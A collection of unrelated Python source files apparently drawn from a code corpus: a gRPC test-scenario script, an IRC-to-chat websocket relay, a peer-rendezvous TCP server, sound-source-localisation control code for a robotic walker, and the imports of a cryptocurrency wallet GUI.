thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
def shutdown(self, wait=True):
pass
def infinite_request_iterator():
while True:
yield REQUEST
if __name__ == '__main__':
logging.basicConfig()
parser = argparse.ArgumentParser()
parser.add_argument('scenario', type=str)
parser.add_argument('--wait_for_interrupt',
dest='wait_for_interrupt',
action='store_true')
args = parser.parse_args()
if args.scenario == UNSTARTED_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == RUNNING_SERVER:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY_NO_SERVER:
channel = grpc.insecure_channel('localhost:12345')
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
elif args.scenario == POLL_CONNECTIVITY:
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
def connectivity_callback(connectivity):
pass
channel.subscribe(connectivity_callback, try_to_connect=True)
if args.wait_for_interrupt:
time.sleep(WAIT_TIME)
else:
handler = GenericHandler()
server = grpc.server(DaemonPool(), options=(('grpc.so_reuseport', 0),))
port = server.add_insecure_port('[::]:0')
server.add_generic_rpc_handlers((handler,))
server.start()
channel = grpc.insecure_channel('localhost:%d' % port)
method = TEST_TO_METHOD[args.scenario]
if args.scenario == IN_FLIGHT_UNARY_UNARY_CALL:
multi_callable = channel.unary_unary(method)
future = multi_callable.future(REQUEST)
result, call = multi_callable.with_call(REQUEST)
elif (args.scenario == IN_FLIGHT_UNARY_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_UNARY_STREAM_CALL):
multi_callable = channel.unary_stream(method)
response_iterator = multi_callable(REQUEST)
for response in response_iterator:
pass
elif (args.scenario == IN_FLIGHT_STREAM_UNARY_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_UNARY_CALL):
multi_callable = channel.stream_unary(method)
future = multi_callable.future(infinite_request_iterator())
result, call = multi_callable.with_call(
iter([REQUEST] * test_constants.STREAM_LENGTH))
elif (args.scenario == IN_FLIGHT_STREAM_STREAM_CALL or
args.scenario == IN_FLIGHT_PARTIAL_STREAM_STREAM_CALL):
multi_callable = channel.stream_stream(method)
response_iterator = multi_callable(infinite_request_iterator())
for response in response_iterator:
pass
|
relay.py
|
#!/usr/bin/env python3
import hashlib
import html
import json
import re
import socketserver
import sys
import threading
import time
import configparser
import requests
import websocket
socketserver.TCPServer.allow_reuse_address = True
IRCRE = ('^(?::(\S+?)(?:!(\S+?))?(?:@(\S+?))? )?' # Nick!User@Host
+ '(\S+)(?: (?!:)(.+?))?(?: :(.+))?$') # CMD Params Params :Message
IRC_MAX_BYTES = 512
IRC_CHANPREFIX = '#'
# TODO: Better splitting algorithm
def splitbytes(mystr, maxbytes, encoding):
while mystr:
target = maxbytes
while True:
segment = mystr[:target].encode(encoding)
if len(segment) <= maxbytes:
yield segment
break
target -= 1
if target <= 0:
raise Exception()
mystr = mystr[target:]
# TODO: Normalize error handling
class TCPHandler(socketserver.BaseRequestHandler):
'''Handles IRC (TCP) and SBS (WS) connections'''
# ----- TCP Event Handlers -----
def handle(self):
buf = b''
while True:
data = self.request.recv(1024)
if not data: break
buf += data
*lines, buf = buf.split(b'\r\n')
for line in lines:
print(b'irc<' + line) # log incoming data
self.irc_handle(line.decode(self.config['encoding'], 'replace'))
# TODO: better disconnect handling
self.ws.close()
def irc_handle(self, line):
'''Parses a line of IRC protocol and calls the appropriate handler'''
matched = re.match(IRCRE, line)
nick, user, host, cmd, params, msg = matched.groups()
if hasattr(self, 'irc_on' + cmd): # Method lookup
handler = getattr(self, 'irc_on' + cmd)
handler(nick, user, host, cmd, (params or '').split(' '), msg)
else:
self.irc_sendUNKOWNCOMMAND(self.nick, cmd, 'Unkown Command')
# ----- IRC Send Methods -----
def irc_send(self, message, prefix='', suffix=''):
'''Sends a line of IRC protocl, breaking into
IRC_MAX_BYTES sections as appropriate while
preserving utf-8 multibyte sequences'''
output = []
prefix = prefix.encode(self.config['encoding'])
suffix = suffix.encode(self.config['encoding'])
maxbytes = IRC_MAX_BYTES - len(b'\r\n') - len(prefix) - len(suffix)
for line in message.split('\r\n'):
for part in splitbytes(line, maxbytes, self.config['encoding']):
print(b'irc>' + prefix + part + suffix)
self.request.send(prefix + part + suffix + b'\r\n')
output.append(part)
return output
def irc_sendUNKOWNCOMMAND(self, target, command, reason):
return self.irc_send(reason, ':{} 421 {} {} :'.format(
self.config['irc_name'], target, command))
def irc_sendNOMOTD(self, target, reason):
return self.irc_send(reason, ':{} 422 {} :'.format(
self.config['irc_name'], target))
def irc_sendWELCOME(self, target, message):
return self.irc_send(message, ':{} 001 {} :'.format(
self.config['irc_name'], target))
def irc_sendNOTICE(self, message, target=None):
return self.irc_send(message, ':{} NOTICE {} :'.format(
self.config['irc_name'], target or self.nick))
def irc_sendJOIN(self, nick, channel):
return self.irc_send(':{} JOIN {}'.format(nick, channel))
def irc_sendNAMREPLY(self, target, channel, nicks):
'''Takes a list of names and sends one or more RPL_NAMREPLY messages,
followed by a RPL_ENDOFNAMES message'''
prefix = ':{} 353 {} = {} :'.format(
self.config['irc_name'], target, channel)
maxbytes = IRC_MAX_BYTES - len(b'\r\n') - \
len(prefix.encode(self.config['encoding']))
while nicks:
for i in range(1, len(nicks)+1):
line = ' '.join(nicks[:i]).encode(self.config['encoding'])
if len(line) > maxbytes:
i -= 1
break
line = ' '.join(nicks[:i])
nicks = nicks[i:]
self.irc_send(line, prefix)
self.irc_send('End of NAMES list', ':{} 366 {} {} :'.format(
self.config['irc_name'], target, channel))
def irc_sendQUIT(self, source): # TODO: Allow quit message
return self.irc_send(':{} QUIT'.format(source))
def irc_sendPRIVMSG(self, source, target, message):
return self.irc_send(
message,
':{} PRIVMSG {} :'.format(source, target)
)
def irc_sendACTION(self, source, target, message):
return self.irc_send(
message,
':{} PRIVMSG {} :\x01ACTION '.format(source, target),
'\x01'
)
# ----- IRC Message Handlers -----
def irc_onPASS(self, nick, user, host, cmd, params, msg):
self.sbs_pass = params[0]
def irc_onNICK(self, nick, user, host, cmd, params, msg):
self.nick = params[0]
def irc_onCAP(self, nick, user, host, cmd, params, msg):
pass # TODO: Implement?
def irc_onUSER(self, nick, user, host, cmd, params, msg):
'''Initializes the SBS connection'''
# TODO: use the USER information for something
# TODO: better error handling
# TODO: start 30s activity ping
# TODO: figure out how to trigger initial message wave
# Initiate server-side IRC connection
# Make sure to join user to channels before the ws
# tries to send the nick lists for those channels
self.irc_channels = {}
self.irc_sendWELCOME(self.nick, 'Welcome {}!'.format(self.nick))
self.irc_sendNOMOTD(self.nick, 'ERR_NOMOTD')
# Get the user's ID and access token
r = requests.post(self.config['sbs_query'] + '/usercheck',
params={'username': self.nick})
self.sbs_uid = r.json()['result']
r = requests.post(self.config['sbs_query'] + '/chatauth', data={
'username': self.nick,
'password': hashlib.md5(self.sbs_pass.encode('utf-8')).hexdigest()
})
self.sbs_token = r.json()['result']
# Initiate the websocket connection to the SBS servers
self.sbs_used_ids = set()
self.sbs_nicks = {}
self.ws = websocket.WebSocketApp(
'ws://{}:{}/chatserver'.format(
self.config['sbs_host'], self.config['sbs_port']),
on_open = self.ws_open,
on_message = self.ws_message,
on_error = self.ws_error,
on_close = self.ws_close
)
thread = threading.Thread(target=self.ws.run_forever)
thread.daemon = True
thread.start()
def irc_onJOIN(self, nick, user, host, cmd, params, msg):
channel = params[0]
source = self.nick+'!'+str(self.sbs_uid)+'@'+self.config['sbs_host']
for channel in params[0].split(','):
if channel not in self.irc_channels:
self.irc_sendNOTICE(
'[ERROR] Unkown channel: {}'.format(channel))
continue
self.irc_sendJOIN(source, channel)
self.irc_sendNAMREPLY(
self.nick, channel, self.irc_channels[channel])
def irc_onPING(self, nick, user, host, cmd, params, msg):
self.irc_send('PONG {}'.format(params[0]))
def irc_onPRIVMSG(self, nick, user, host, cmd, params, msg):
if msg.startswith('\x01ACTION') and msg.endswith('\x01'):
msg = '/me ' + msg[len('\x01ACTION'):len('\x01')]
self.sbs_send({
'type': 'message',
'key': self.sbs_token,
'text': msg,
'tag': params[0][len(IRC_CHANPREFIX):]
})
# ----- WS Event Handlers -----
def ws_open(self, ws):
# Authenticate with the SBS chat server
self.sbs_send({
'type': 'bind',
'uid': self.sbs_uid,
'key': self.sbs_token
})
def ws_message(self, ws, framedata):
print('sbs<' + framedata)
frame = json.loads(framedata)
if hasattr(self, 'sbs_on' + frame['type']):
handler = getattr(self, 'sbs_on' + frame['type'])
handler(frame)
else:
self.irc_sendNOTICE('[ERROR] Unkown frame:')
self.irc_sendNOTICE(framedata)
def ws_error(self, ws, error):
raise Exception("Websocket Error: {}".format(error))
def ws_close(self, ws):
# TODO: Gracefully handle disconnect
print("CLOSING WEBSOCKET")
# ----- SBS Send Methods -----
def sbs_send(self, data):
data = json.dumps(data)
print('sbs>' + data)
self.ws.send(data)
# ----- SBS Event Handlers -----
def sbs_onuserList(self, frame):
self.sbs_userlist = frame
# TODO: support rooms properly
nicks = {user['username']: user for user in frame['users']}
# Diff the nick lists
newnicks = list(set(nicks) - set(self.sbs_nicks))
oldnicks = list(set(self.sbs_nicks) - set(nicks))
if self.nick in newnicks: # Initial channel join
for tag in self.config['tags'].split(','):
self.irc_channels[IRC_CHANPREFIX + tag] = list(nicks)
self.irc_onJOIN(None, None, None, # Join user to channel
'JOIN', [IRC_CHANPREFIX + tag], None)
else:
for tag in self.config['tags'].split(','):
for nick in newnicks:
self.irc_channels[IRC_CHANPREFIX + tag] = list(nicks)
self.irc_sendJOIN(self.sbs_getuser(nick, nicklist=nicks),
IRC_CHANPREFIX + tag)
# Handle absent nicks
for nick in oldnicks:
self.irc_sendQUIT(self.sbs_getuser(nick))
# Save new list for later comparison
self.sbs_nicks = nicks
def sbs_getuser(self, nick, nicklist=None):
if nicklist is None:
nicklist = self.sbs_nicks
if nick in nicklist:
uid = nicklist[nick]['uid']
else:
uid = 0 # TODO: Better handling
return '{}!{}@{}'.format(
nick,
uid,
self.config['sbs_host']
)
def sbs_onmessageList(self, frame):
# TODO: Handle case where user is not in userlist
# TODO: Handle timestamp mismatch (initial scrollback)
for message in frame['messages']:
if message['id'] in self.sbs_used_ids:
continue
self.sbs_used_ids.add(message['id'])
if message['username'] == self.nick:
continue
for line in message['message'].splitlines():
if message['encoding'] == 'draw':
try:
decoded = image_decode(line)
except: # TODO: More specific error
decoded = "[ERROR] Couldn't decode image!"
else:
decoded = html.unescape(line)
channel = IRC_CHANPREFIX + message['tag']
if channel not in self.irc_channels:
self.irc_onJOIN(None, None, None, 'JOIN', [channel], None)
self.irc_sendPRIVMSG(
self.sbs_getuser(message['username']),
channel,
decoded
)
def sbs_onmodule(self, frame):
# TODO: Better /me support
message = html.unescape(frame['message'])
if frame['module'] == 'fun':
split = message.split(' ', 1)
if split[0] not in self.sbs_nicks: # Not a /me action message
self.irc_sendNOTICE('[ERROR] Unkown fun module usage:')
self.irc_sendNOTICE(str(frame))
return
if split[0] == self.sbs_nick: # Outgoing message
return
self.irc_sendACTION(
self.sbs_getuser(split[0]),
IRC_CHANPREFIX + frame['tag'],
split[1]
)
else:
self.irc_sendNOTICE('[ERROR] Unkown module frame type:')
self.irc_sendNOTICE(str(frame))
def sbs_onresponse(self, frame):
if not frame['result']:
self.irc_sendNOTICE('[ERROR] Received false response:')
self.irc_sendNOTICE(str(frame))
return
# After initialization completes request initial chat logs
if frame['from'] == 'bind':
self.sbs_send({'type': 'request', 'request': 'messageList'})
def sbs_onsystem(self, frame):
message = html.unescape(frame['message'])
if 'subtype' not in frame:
self.irc_sendNOTICE('[ERROR] System frame missing subytpe:')
self.irc_sendNOTICE(str(frame))
return
if frame['subtype'] in ('join', 'leave'):
return
self.irc_sendNOTICE(message)
class IRCRelay():
class TCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def __init__(self, config_name):
print('Using config {}'.format(config_name))
config = configparser.ConfigParser()
config.read(['default.cfg', 'custom.cfg'], 'utf-8')
self.config = config[config_name]
class Handler(TCPHandler):
config = self.config
self.handler = Handler
def serve(self, daemon=False):
self.server = self.TCPServer(
(self.config['irc_addr'], int(self.config['irc_port'])),
self.handler)
print('Serving on {}:{}'.format(
self.config['irc_addr'], self.config['irc_port']))
thread = threading.Thread(target=self.server.serve_forever)
thread.daemon = daemon
thread.start()
# TODO: close server on exit
#self.server.shutdown()
#self.server.server_close()
if __name__ == '__main__':
if len(sys.argv) > 1:
config_name = sys.argv[1]
else:
config_name = 'DEFAULT'
irc = IRCRelay(config_name)
irc.serve()
|
tcp_server.py
|
import socket
import logging
import threading
import time
from message_wrapper import *
logger = logging.getLogger('tcp_server')
logging.basicConfig(level=logging.INFO,format='%(asctime)s - %(message)s')
class TcpServer(object):
def __init__(self,port):
self.port = port
self.clients={}
self.peers = {}
def _addr_to_key(self,addr):
return addr[0] + ':' + str(addr[1])
def get_client(self,addr):
return self.clients.get(self._addr_to_key(addr))
def set_client(self,addr,client_info):
self.clients[self._addr_to_key(addr)] = client_info
def _client_handler(self,conn,client_addr,stop_event):
while(not stop_event.is_set()):
try:
data = conn.recv(1024)
if(len(data)==0):
time.sleep(1)
continue
command,msg = de_wapper(data)
logger.info('from client command: %d,%s', command,msg.__str__())
if(command==COMMAND_SIGN):
client_local_addr = msg['local_addr']
peer_key = msg['peer_key']
client_info = self.get_client(client_addr)
client_info['local_addr'] = client_local_addr
client_info['peer_key'] = peer_key
self.set_client(client_addr,client_info)
msg = {'public_addr':client_addr}
logger.info('message send to client:%s', msg.__str__())
conn.send(wapper(COMMAND_SIGN_ACK,msg))
elif(command==COMMAND_REQUEST_PEER):
peer_key = msg['peer_key']
peers = []
logger.info('begin to get peer for:%s:%d',client_addr[0],client_addr[1])
for key,item in self.clients.items():
if(item.get('peer_key') is not None and item.get('peer_key')==peer_key):
if(key!=self._addr_to_key(client_addr)):
peers.append(item.get('public_addr'))
#send peers to A
logger.info('send connect request to peer:%s',client_addr.__str__())
item['conn'].send(wapper(COMMAND_REQUEST_PEER_CLIENT,{'peers':client_addr}))
time.sleep(1)
if len(peers)>0: peers.append(())
msg={'peers':peers}
logger.info('message send to client:%s', msg.__str__())
conn.send(wapper(COMMAND_REQUEST_PEER_ACK,msg))
except socket.timeout:
conn.close()
break
def _accept(self,fsock,stop_event):
while(not stop_event.is_set()):
try:
conn,addr = fsock.accept()
except socket.timeout:
logger.info('timeout waiting for next connect')
continue
logger.info('connection from: %s:%d',addr[0],addr[1])
client_thread = threading.Thread(target=self._client_handler,args=(conn,addr,stop_event))
client_info = {}
client_info['thread'] = client_thread
client_info['public_addr'] = addr
client_info['conn'] = conn
self.set_client(addr,client_info)
client_thread.start()
def run(self):
self.stop_event = threading.Event()
self.fsock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.fsock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.fsock.bind(('0.0.0.0',self.port))
self.fsock.listen()
# self.fsock.settimeout(2)
logger.info('server start at %d' , self.port)
self.run_thread = threading.Thread(target=self._accept,args=(self.fsock,self.stop_event,))
self.run_thread.start()
def stop(self):
self.stop_event.set()
time.sleep(1)
self.fsock.close()
if __name__ == '__main__':
server = TcpServer(12345)
server.run()
input()
logger.info('waiting connections to close')
server.stop()
|
ssl_Process.py
|
# !/usr/bin/env python
# -*- coding:utf-8 _*-
# @Author: swang
# @Contact: wang00sheng@gmail.com
# @Project Name: SmartWalker-master
# @File: ssl_loop.py
# @Time: 2022/01/02/20:34
# @Software: PyCharm
import os, sys
code_dir = os.path.dirname(os.path.abspath(__file__))
module_dir = os.path.dirname(code_dir)
project_dir = os.path.dirname(module_dir)
sys.path.extend([module_dir, project_dir])
# print('project_dir:', project_dir)
import time
import json
import numpy as np
from scipy import stats
import threading
from multiprocessing import Process, Value, Pipe, Queue
# general lib
from SoundSourceLocalization.mylib import utils
from SoundSourceLocalization.mylib.utils import standard_normalizaion
from SoundSourceLocalization.mylib.audiolib import normalize_single_channel_audio, audio_segmenter_4_numpy, \
audio_energy_ratio_over_threshold, audio_energy_over_threshold, audioread, audiowrite
# independent systems
from SoundSourceLocalization.SSL_Settings import *
import SoundSourceLocalization.SpeechEnhancement.code.ns_enhance_onnx as ns_enhance_onnx
from SoundSourceLocalization.SSL.code.ssl_audio_processor import *
from SoundSourceLocalization.SSL.code.ssl_feature_extractor import FeatureExtractor
from SoundSourceLocalization.SSL.code.ssl_DOA_model import DOA
from SoundSourceLocalization.SSL.code.ssl_turning import SSLturning
from SoundSourceLocalization.ReinforcementLearning.code.ssl_agent import Agent
from SoundSourceLocalization.ReinforcementLearning.code.ssl_env import MAP_ENV, ONLINE_MAP_ENV
# from SoundSourceLocalization.ReinforcementLearning.code.ssl_actor_critic import Actor, Critic
# # from Communication.Soundlocalization_socket_local import server_receive, server_transmit
# from Communication.Soundlocalization_socket import CLIENT
import Driver.ControlOdometryDriver as CD
class SSL(object):
def __init__(self, doDenoise=True, useCD=True, seg_len='256ms', isDebug=False):
print('-' * 20 + 'init SSL class' + '-' * 20)
self.isDebug = isDebug
self.doDrop = False
self.doDenoise = doDenoise # useless
self.useCD = useCD
self.frames = []
segment_para_set = {
'32ms' : {
'name' : '32ms',
'time_len' : 32 / 1000,
'threshold': 100,
'stepsize' : 0.5
},
'50ms' : {
'name' : '50ms',
'time_len' : 50 / 1000,
'threshold': 100,
'stepsize' : 0.5
},
'64ms' : {
'name' : '64ms',
'time_len' : 64 / 1000,
'threshold': 100,
'stepsize' : 0.5
},
'128ms': {
'name' : '128ms',
'time_len' : 128 / 1000,
'threshold': 200, # 100?
'stepsize' : 0.5
},
'256ms': {
'name' : '256ms',
'time_len' : 256. / 1000,
'threshold': 400,
'stepsize' : 256. / 1000 / 2
},
'1s' : {
'name' : '1s',
'time_len' : 1.,
'threshold': 800,
'stepsize' : 0.5
},
}
self.seg_para = segment_para_set[seg_len]
ref_audio, _ = audioread(os.path.abspath('./reference_wav.wav'))
self.ref_audio = normalize_single_channel_audio(ref_audio)
self.ref_audio_threshold = (self.ref_audio ** 2).sum() / len(self.ref_audio) / 500
del ref_audio, self.ref_audio,
# feature paras
self.num_gcc_bin = 128
self.num_mel_bin = 128
self.fft_len = utils.next_greater_power_of_2(self.seg_para['time_len'] * SAMPLE_RATE)
# SpeechEnhancement
print('-' * 20, 'Loading denoising model...', '-' * 20, )
self.denoise_model, _ = ns_enhance_onnx.load_onnx_model()
# DOA
print('-' * 20, 'Loading DOA model...', '-' * 20, )
num_action = 8
self.doa = DOA(model_dir=os.path.abspath('./model/EEGNet/ckpt'), fft_len=self.fft_len,
num_gcc_bin=self.num_gcc_bin, num_mel_bin=self.num_mel_bin, fs=SAMPLE_RATE, )
# RL
self.save_model_steps = 3
self.env = ONLINE_MAP_ENV()
self.save_ac_model = './model/ac_model'
self.agent = Agent(alpha=1., num_action=num_action, gamma=0.99, ac_model_dir=self.save_ac_model,
load_ac_model=True, save_model_steps=self.save_model_steps)
# Communication with Sensors
# self.client = CLIENT()
self.client = None
def drop_audio_per_seg_point(self, signal_segment, ):
'''
return flag to determine whether a audio segment should be dropped or not, based on two standards:
1. audio_energy_ratio
2. audio_energy_over_threshold
:param signal_segment:
:return: boolean flag
'''
signal_mean = signal_segment.mean(axis=0)
return not (audio_energy_over_threshold(signal_mean, threshold=self.ref_audio_threshold, ) and
audio_energy_ratio_over_threshold(signal_mean, fs=SAMPLE_RATE,
threshold=self.seg_para['threshold'], ))
def save_continuous_True(self, ini_list, num=3): # todo
pass
def drop_audio_clips(self, signal_segments, ):
# print('Number of segments before dropping: ', len(signal_segments))
audio_segments = []
drop_flag = []
for i in range(len(signal_segments)):
drop_flag.append(self.drop_audio_per_seg_point(signal_segments[i]))
if not drop_flag[-1]:
audio_segments.append(signal_segments[i])
else:
continue
# audio_segments.append([])
# print('Number of segments after dropping: ', len(audio_segments))
return np.array(audio_segments), drop_flag
def normalize_batch_audio(self, audio_batch):
'''
For every audio in a batch, normalize its channels respectively.
:param audio_batch:
:return:
'''
res_audio = []
for audio_channels in audio_batch:
norm_audio_channels = []
for audio in audio_channels:
norm_audio_channels.append(normalize_single_channel_audio(audio))
res_audio.append(norm_audio_channels)
return np.asarray(res_audio)
def denoise_batch_audio(self, audio_batch):
'''
For every audio in a batch, denoise its channels respectively.
:param audio_batch:
:return:
'''
res_audio = []
for audio_channels in audio_batch:
denoised_channels = []
for audio in audio_channels:
denoised_channels.append(
ns_enhance_onnx.denoise_nsnet2(audio=audio, fs=SAMPLE_RATE, model=self.denoise_model, ))
res_audio.append(denoised_channels)
return np.asarray(res_audio)
def preprocess_ini_signal(self, ini_signals):
'''
preprocess the received signals. Must be consistent with the dataset preprocessing method.
:param ini_signals:
:return:
'''
ini_signals = np.array(ini_signals, dtype=np.float64)
segs = np.array([audio_segmenter_4_numpy(signal, fs=SAMPLE_RATE, segment_len=self.seg_para['time_len'],
stepsize=self.seg_para['stepsize'], window='hann', padding=False,
pow_2=True) for signal in ini_signals]).transpose(1, 0, 2)
# norm_segs = segs
norm_segs = self.normalize_batch_audio(segs)
denoised_norm_segs = self.denoise_batch_audio(audio_batch=norm_segs)
if self.doDrop:
drop_denoised_norm_segs, drop_flag = self.drop_audio_clips(signal_segments=denoised_norm_segs)
else:
drop_denoised_norm_segs, drop_flag = denoised_norm_segs, [False, ] * len(denoised_norm_segs)
final_segments = self.normalize_batch_audio(drop_denoised_norm_segs)
return final_segments, drop_flag
def convert_owen_dir_2_digit(self, rad):
rad = rad if (rad >= 0) else (rad + 2 * np.pi)
degree = rad * 180 / np.pi
dir_digit = (int(degree + 22.5) // 45 + 8 - 2) % 8
print('degree: ', degree, 'dir_digit: ', dir_digit)
return dir_digit
def convert_owen_location_2_map(self, location):
location = [location[0] - 40, location[1] - 12]
return location
def convert_map_location_2_owen(self, location):
if np.allclose(location, [60, 425]): # 1
location = [120, 440]
elif np.allclose(location, [160, 320]): # 2
location = [196, 326]
elif np.allclose(location, [220, 15]): # 9
location = [246, 30]
elif np.allclose(location, [530, 220]): # 18
location = [560, 232]
else:
location = [location[0] + 40, location[1] + 12]
return location
def get_crt_position(self):
# message = '[320.5940246582031,201.4725799560547,-1.5714188814163208]'
while True:
message = self.client.receive()
if message != '':
break
print('End receiving: ', message)
message = json.loads(message)
location = self.convert_owen_location_2_map(message[0:2])
dir_digit = self.convert_owen_dir_2_digit(message[2])
return location, dir_digit
def send_crt_position(self, position, ):
(y, x) = self.convert_map_location_2_owen(position)
message = [int(y), int(x)]
print('Starting to send')
self.client.transmit(message=message)
print('End sending: ', message)
def get_audio_from_pipe(self, ):
''' 简单起见,目前只选取最新的数据,且距离发送时间不超过0.5s
实际测试发现,KWS传过来的声音对于单个单词持续时间在 [0.2, 0.5]s 之间
:return audio
'''
res = []
noData = True
while noData:
start_time = time.time()
while self.RECV_PIPE.poll():
msg = self.RECV_PIPE.recv()
(audio, y, prob, send_time) = msg
if abs(start_time - send_time) < KWS_TIMEOUT_SECONDS:
res.append(msg)
noData = False
print('SSL: walker data is received~', )
return res[-1][0]
def run(self, RECV_PIPE, control, ):
self.RECV_PIPE = RECV_PIPE
# initialize models
doa = self.doa
num_step = 0
# steps
while True:
# Detecting for walker_name
ini_signals = self.get_audio_from_pipe()
# preprocess initial audios
audio_segments, drop_flag = self.preprocess_ini_signal(ini_signals)
print('Number of preprocessed audio segments: ', len(audio_segments))
if not (len(audio_segments) > 0):
continue
num_step += 1
print('-' * 20, num_step, '-' * 20)
# calculate features
gcc_feature_batch = doa.extract_gcc_phat_4_batch(audio_segments)
gcc_feature_batch = np.mean(gcc_feature_batch, axis=0)[np.newaxis, :]
_, direction = doa.predict(gcc_feature_batch)
print("Producing action ...\n", 'Direction', direction)
### 接入Owen的模块,传入aim_loca
if self.useCD:
direction = direction[0] * 45
SSLturning(control, direction)
control.speed = STEP_SIZE / FORWARD_SECONDS
control.radius = 0
control.omega = 0
time.sleep(FORWARD_SECONDS)
control.speed = 0
print("movement done.")
else:
pass
def run_RL(self, RECV_PIPE, control, ):
# initialize models
doa = self.doa
# configuration for RL
env = self.env
agent = self.agent
state, state_, = None, None,
node, node_ = None, None
action, action_ = None, None
reward, reward_ = None, None
done = False
num_step = 0
reward_history = []
position = None
# steps
while True:
time.sleep(0.5)
# Detecting for walker_name
if VoiceMenu.SSL_AUDIO_UPDATE:
ini_signals, y, prob = VoiceMenu.SSL_AUDIO
VoiceMenu.SSL_AUDIO_UPDATE = False
# save data
# ini_dir = os.path.join(WAV_PATH, save_dir, 'ini_signal')
# self.save_multi_channel_audio(ini_dir, ini_signals, fs=SAMPLE_RATE, norm=False, )
else:
continue
# preprocess initial audios
audio_segments, drop_flag = self.preprocess_ini_signal(ini_signals)
print('Number of preprocessed audio segments: ', len(audio_segments))
if not (len(audio_segments) > 0):
continue
num_step += 1
print('-' * 20, num_step, '-' * 20)
'''------------------------- 获取可行方向 -----------------------------'''
# 获取实时位置
if isDebug:
# crt_position = input('please input current position and direction')
crt_position = '280 160 2'
crt_position = list(map(float, crt_position.split(' ')))
crt_loca, crt_abs_doa = crt_position[:2], int(crt_position[2])
else:
crt_loca, crt_abs_doa = self.get_crt_position()
print('crt_location: ', crt_loca, 'crt_abs_doa: ', crt_abs_doa)
# 获取可行方向
crt_node = env.get_graph_node_idx(position=crt_loca)
node_ = crt_node
abs_availalbe_dircs = env.get_availalbe_dircs(node_idx=crt_node) # 此处方向应该以小车为坐标系,但是获得的方向是绝对坐标系。
# print('availalbe_dircs: ', availalbe_dircs)
abs_dirc_mask = np.array(np.array(abs_availalbe_dircs) != None)
rela_dirc_mask = np.roll(abs_dirc_mask, shift=-crt_abs_doa)
# print('rela_dirc_mask: ', rela_dirc_mask)
dirc_digit = np.where(rela_dirc_mask)
print("crt_node: ", crt_node, 'avaliable_rela_dirc_digit: ', list(dirc_digit))
'''--------------------------- 强化学习 -------------------------------'''
# update state
if not self.isDebug:
gcc_feature_batch = doa.extract_gcc_phat_4_batch(audio_segments)
gcc_feature = np.mean(gcc_feature_batch, axis=0)
state_ = gcc_feature
else:
state_ = np.ones((1, 6, 128))
### 接入强化学习 learn
# 选择行为前,mask掉不可行的方向
action_ = agent.choose_action(state_, dirc_mask=rela_dirc_mask, sample=True)
# _, direction_cate, = doa.predict(gcc_feature)
# print(direction_prob)
print('Predicted action_: ', action_)
# print("Producing action ...\n", 'Direction', direction)
aim_node = env.next_id_from_rela_action(crt_node, action=action_, abs_doa=crt_abs_doa)
aim_loca = env.map.coordinates[aim_node]
position = aim_loca
print('aim_node: ', aim_node, 'aim_loca: ', aim_loca)
### 接入Owen的模块,传入aim_loca
if self.useCD:
SSLturning(control, action_)
control.speed = STEP_SIZE / FORWARD_SECONDS
control.radius = 0
control.omega = 0
time.sleep(FORWARD_SECONDS)
control.speed = 0
print("movement done.")
else:
self.send_crt_position(aim_loca)
# 维护 done TODO
# 强化
if state is not None:
# state_, reward, done, info = env.step(action)
# reward = reward_history[-1]
agent.learn(state, action, reward, state_, done)
reward_ = float(input('Please input the reward for this action: '))
state = state_
node = node_
action = action_
reward = reward_
class SSL_Process(object):
def __init__(self, doDenoise=True, useCD=True, seg_len='256ms', isDebug=False, ):
super(SSL_Process, self).__init__()
self.seg_len = seg_len
self.doDenoise = doDenoise
self.useCD = useCD
self.isDebug = isDebug
def run(self, RECV_PIPE, left_right):
cd = CD.ControlDriver(left_right=left_right) if self.useCD else ''
if self.useCD:
cd_thread = threading.Thread(target=cd.control_part, args=())
cd_thread.start()
ssl = SSL(seg_len=self.seg_len, doDenoise=self.doDenoise, useCD=self.useCD, isDebug=self.isDebug, )
ssl.run(RECV_PIPE, cd, )
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_mona.storage import WalletStorage, StorageReadWriteError
from electrum_mona.wallet_db import WalletDB
from electrum_mona.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_mona.wallet import check_password_for_directory, update_password_for_directory
from electrum_mona.plugin import run_hook
from electrum_mona import util
from electrum_mona.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_mona.invoices import PR_PAID, PR_FAILED
from electrum_mona import blockchain
from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mona.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_mona.logging import Logger
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_mona.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_mona.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_mona.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_mona.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
